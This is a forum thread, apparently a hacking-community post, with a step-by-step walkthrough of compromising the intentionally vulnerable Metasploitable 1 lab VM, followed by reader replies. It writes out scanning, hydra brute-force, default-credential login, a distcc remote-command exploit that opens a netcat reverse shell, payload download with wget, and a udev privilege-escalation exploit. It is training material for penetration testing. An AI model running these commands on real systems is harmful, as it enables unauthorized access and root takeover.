Metasploitable 1 - Walkthrough


#1

Hey people!

During my learning process I experimented a lot with this VM. In my opinion the vulnerabilities on this VM are pretty simple and you can optimize and improve your methodology on it.
On this walkthrough I will show you how I’ll go through without using MSF, Nessus, OpenVAS, etc.

For this I will using the basic setup of Kali.

Methodology:

  1. Detect Living Host(s)
  2. Open TCP Ports
  3. Open UDP Ports
  4. Service Detection
  5. Service Enumeration
  6. User Enumeration from Services
  7. Password Profiling
  8. Brute Forcing
  9. Detect Running OS
  10. Simple Vulnerabilities Detection
  11. Manual Vulnerabilities Detection
  12. Exploit Research
  13. Exploit Fix
  14. Exploitation
  15. Post-Enumeration
  16. Privilege Escalation
  17. Proofs

Notice thats my methodology which I developed for the OSCP and are not the steps I’ll going through. So I will possibly jump or skip over the topics.

1. Detect Living Host

So at first I want to detect the IP of the metasploitable VM.
I’ll use nmap for it.

nmap -sn -n 10.11.1.0/24 | grep for | cut -d" " -f5

2. Open TCP ports

Now, after I detected the IP of the target (10.11.1.10) I will run a light TCP scan and try to detect open ports and the services running on it.

nmap -n -Pn -sS 10.11.1.10 --open --reason -sV --top-ports 200

Sweet. Thats a lot of open ports. :smiley:
So lets run a full and aggressive TCP scan in the background and at the same time I’ll manually scan Samba & SMTP services which will hopefully receive some users for this machine.

# nmap -n -Pn -sS 10.11.1.10 --open --reason -A -p- > metasploitable &

Because I found a lot of open ports I’ll jump to the User Enumeration topic.

6. User Enumeration from Services

The heavy scan is running in the background so we can proceed and try to enumerate from the Samba service some users using enum4linux:
# enum4linux -U 10.11.1.10

Here is the output:

Now I will create a userlist of the Samba service that I will use later.
# !! | grep 'user:' | cut -d'[' -f2 | cut -d']' -f1 > userlist

Lets check if I can find some users using smtp-user-enum.py with the VRFY command:
# smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.11.1.10 > smtp_users

Now I will generate an userlist of all the users I found.
# cat smtp_users | grep exists | cut -d" " -f2 >> users

Nice!
If you noticed from above the heavy TCP scan has been finished too.
Lets see which new ports has been found.

7. Password Profiling

For the first step of password profiling I’ll use the list of the usernames we previously enumerated as the first stage of my passwordlist.
I will return to this point later when we take a look over other services.

8. Brute Forcing

Now the heavy scan shows me two new ports (3632 & 8180). Next I will use hydra to bruteforce the FTP, SSH, Telnet, NetBIOS, MySQL and PostgreSQL service and try to login. As credentials I will use enumerated usernames as passwords.

### FTP ###
hydra -L users_metasploitable -e nsr ftp://10.11.1.10 -q -o ftp_login

### SSH ###
hydra -L users_metasploitable -e nsr ssh://10.11.1.10 -q -o ssh_login

### Telnet ###
hydra -L users_metasploitable -e nsr telnet://10.11.1.10 -q -o telnet_login

### NetBIOS ###
hydra -L users_metasploitable -e nsr smb://10.11.1.10 -q -o smb_login

### MySQL ###
hydra -L users_metasploitable -e nsr mysql://10.11.1.10 -q -o mysql_login

### PostgreSQL ###
hydra -L users_metasploitable -e nsr postgres://10.11.1.10 -q -o postgres_login

Very nice!
There are a lot of accounts we can use to login on the machine. :smiley:
But first let me compare the results to one single list.

cat ftp_login mysql_login postgres_login smb_login ssh_login telnet_login | grep host | column -t > metasploitable_accounts

As you can see, it was a quick task and we have some accounts we can use to login but the user msfadmin looks like it could be in the sudoers group. So I will start with this user.

9. OS Detection

To identify the exact OS informations I’ll start just now to enumerate the exact OS, because the banners of the results from nmap can be false positive or just not exactly enough. So I have to identify the exact OS version manually using ssh.

So let me login using the SSH service:
# ssh [email protected]
.. (yes/no)? yes
... password: msfadmin
$ uname -a

Now lets take a look if we have access to run a shell with root privileges.

$ sudo -i
password: msfadmin

One of a lot ways are done!

Now I have access to a full privileged account and I’m controlling the system. There exist more other ways to pwn this machine. I showed you the first way I tried out.

Let’s see if I can break into using another way.

10. Simple Vulnerability Detection

What I will do is a simple vulnerability scan with nmap.

# nmap --script vuln 10.11.1.10 -p- --open

This scan shows me a lot of vulnerable stuff but the most of them are SSL or DOS vulnerabilities. I picked up the distcc daemon because the vulnerability seems to be exploitable.

12. Exploit Research

I found an exploit by using searchsploit pretty fast. There is just one result.

# searchsploit distcc

Mh. The exploit is handled by MSF and I don’t want to use it.
So let me think a little bit. Did I missed something?
How did I found this vulnerability? -> Using Nmap.
Ok. I used a script for that.
So let me take a look one more time at the results.

Oh… I overlooked that the script (distcc-cve2004-2687.nse) used the id command for the “Extra Information” which shows me the uid of the current user. :slightly_frowning_face: * shame *
So it looks like the Nmap sent this command to this service. Let me take a look over the documentation of this script from the homepage.
NSE-doc: distcc-cve2004-2687.nse

14. Exploitation

Let me change it to possibly get a bind shell using netcat at first and then try to connect to it.

Nice! Bind shell works and additional I found out the machine has netcat installed. Let me see if a reverse shell works too.
So I setup a listener on port 6666 and then run the nmap-script with the cmd for a reverse shell.

# nmap 10.11.1.10 -p 3632 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='nc -nv 10.11.1.11 6666 -e /bin/sh'"

Very nice! Now I have a reverse shell.
Now I want to spawn a TTY using python.

python -c 'import pty; pty.spawn("/bin/sh")'

15. Post-Enumeration

Now I want to get root without interactive mode for sudo. So I have to enumerate some stuff.

$ uname -a
$ cat /proc/version

The kernel & OS version seems to be outdated. * … You don’t say… *
I take a quick search on google to find an privilege escalation exploit especially for this version.
So I search for Ubuntu 4.2.3-2ubuntu7. Google shows me the name of this version called Hardy.

My next step is to google for this version name. And you can see a few interesting results.
I searched a little bit about every exploit and found the CVE-2009-1185 very pretty. I will try it out. In the results before I found it on the exploit-db. So maybe I have it locally already.

searchsploit 8572 linux

Nice!

16. Privilege Escalation

Let’s copy the exploit to my directory.

# locate 8572.c
# cp /usr/share/exploitdb/platforms/lin_x86-64/local/8572.c privescal.c

I want to take a look inside the code to see if I have to take note for some configurations or usage.

So I have to pay attention to

  1. right PID of udevd (PID - 1 as argv[1]),
  2. /tmp/run and
  3. the payload inside it.

Simple usage.
But before I can transfer this exploit I have to setup a basic Python Webserver on port 8080.

# python -m SimpleHTTPServer 8080

After that I use the reverse shell to get the file with wget from my machine, compile the code, add my payload to /tmp/run and look for the PID.

$ wget http://10.11.1.11:8080/privescal.c
$ gcc privescal.c -o privs
$ echo '#!/bin/sh\n/bin/netcat 10.11.1.11 5555 -e /bin/sh' > /tmp/run
$ ps aux | grep udev

Now I will use the founded PID - 1 (2575) for this exploit.

After starting my listener I’m ready to catch the shell…

# nc -nlvp 5555
$ ./privs 2575

Done!

If you have some advice or recommendation to improve my methodology, or want me to add more ways to it so feel free and just tell me that.

Thx and have a nice day!
Cry0l1t3


(No software interupts) #2

Interesting read mate! I’d like to see in what other ways you were able to pwn the machine besides a brute-force attack.


#3

Especially considering this particular VM is FILLED with holes. ;3


(Mohd Amri) #4

You might wanna check out VulnHub.


(The memelord of 0x00sec) #5

i know i’m a bit late to the party, but a nice walkthrough right there.

maybe a little bit less screenshots would’ve been easier on the eyes, but other than that great writeup


#6

I will create a few extra ways soon. :wink:


#7

I’d like to add an specific reference to this one, which happens to be a really good and free resource by the Offensive Security team.

Metasploit Unleashed is a course (kinda, more like a paper on the solution) they developed which I think is important to anyone that wants to get involved with the solution, in this one they reference to do a lot of the testing with Metasploitable. (link below)

Hope this enhances your post :slight_smile:


(system) #8

This topic was automatically closed after 30 days. New replies are no longer allowed.